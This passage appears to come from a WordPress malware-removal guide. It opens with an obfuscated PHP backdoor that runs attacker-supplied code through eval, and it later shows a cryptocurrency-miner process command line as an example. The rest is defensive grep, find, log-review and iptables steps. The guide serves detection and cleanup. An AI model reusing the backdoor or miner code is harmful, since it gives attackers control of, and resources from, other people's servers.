@$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]]($fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]]($fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]]($u604d9662), $r5401375));if (isset($u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]) && $zbdee44b==$u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]){if ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][97]){$f231 = Array($fb355e['l82418'][78].$fb355e['l82418'][70] => @$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]](),$fb355e['l82418'][74].$fb355e['l82418'][70] => $fb355e['l82418'][49].$fb355e['l82418'][92].$fb355e['l82418'][45].$fb355e['l82418'][80].$fb355e['l82418'][49],);echo @$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]]($f231);}elseif ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][57]){eval/*b1e3a6fe*/($u604d9662[$fb355e['l82418'][56]]);}exit();} ?>
So even though this is the most common function we recommend the following command to detect malware:
grep -r -i --include=*.php '$GLOBALS' /var/www/wordpress/
While the results will be numerous, with this broad spectrum you can thoroughly scan the results for encrypted malware. You can also use a third-party scanner such as this one to automate these queries but are not as reliable as manual analysis.
Don’t hesitate to contact us if the logs are too full or if you have a doubt about some files!
View files modified in the last 24 hours
find /var/www/wordpress/ -mtime -1 -ls
The “-1” here retrieves files modified a day or less ago. If you change it to “+1”, it will show files modified a day or more ago. If you put no sign in front of the “1”, then it will show files modified only a day ago.
Once you’ve cleaned up, redo the following commands to make sure there’s nothing left:
Detect shells hidden in .ico’s
grep -r -i --include=*.ico 'preg_replace' /var/www/wordpress/
Detect injector shells
grep -r -i --include=*.php '*/ @include' /var/www/wordpress/
Detect a suspicious process
htop
This command displays the entire list of running processes on your server. Look for a suspicious process in the list and kill it with F9, example of a suspicious process, here a bitcoin miner (your server is mining btc for a third party attacker) :
500 56885 198 0.1 69408 8028 ? Sl Sep23 5940:27 ./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u [email protected] -p x --variant 1 -k
Check the server logs
In order to ensure that no one else has access to your server or that no suspicious requests are being made, you should analyze your server logs.
Analyze the latest SSH connections
To check who has connected to your SSH server lately, you can use the following commands:
last cat /var/log/auth.log
You can then find unauthorized access attempts and block the IP addresses in question.
Check the web server logs
Whether it’s Apache or Nginx, your web server should be logging. If you don’t, consider changing your configuration. Depending on your configuration, these logs may record a lot of information besides errors: that’s what you’ll need to inspect.
The logs are generally located in :
/var/log/
You can go to this folder and run a :
ls -ltr
In order to display from bottom to top the most recently modified logs and check their content.
Also look at which ips come back often and perform shady actions like POST requests to rogue .ico and .php files then ban them with iptable :
iptables -I INPUT -s IPTOBAN -j DROP
What to do after a disinfection?
We can’t say it enough so we’ll say it again: when you’re done cleaning up your site, you’ll want to remember to do 3 small steps:
- Restart PHP and so refresh the OpCache code
- Restart Redis (if installed on your server)
- Empty your WordPress cache (if you have one like WP Rocket)
- Empty your CDN cache (if you have one like Cloudflare)
With these three steps, you ensure that you don’t have any cached PHP or .ico files that are still rotted and thus could spread the infection again without you knowing why 😉
Finally regenerate your server salts, change your ssh/ftp accesses, change the database accesses and of course wordpress administration.
Secure your site and your server more
If you have failed to clean up your server, your site or you have any doubt about the files you have recovered through our orders, then call on our services. Our experts will analyze this for you and help you clean up your site.
Specifications of your project
Follow the different steps to generate the specifications of your project
Congratulations we have sent you your specifications by email and we will get back to you shortly!
Your specifications has been generated
Your project is estimated to:
Summary
Description | Information | Quantity | Price |
---|---|---|---|
Discount : | |||
Total : |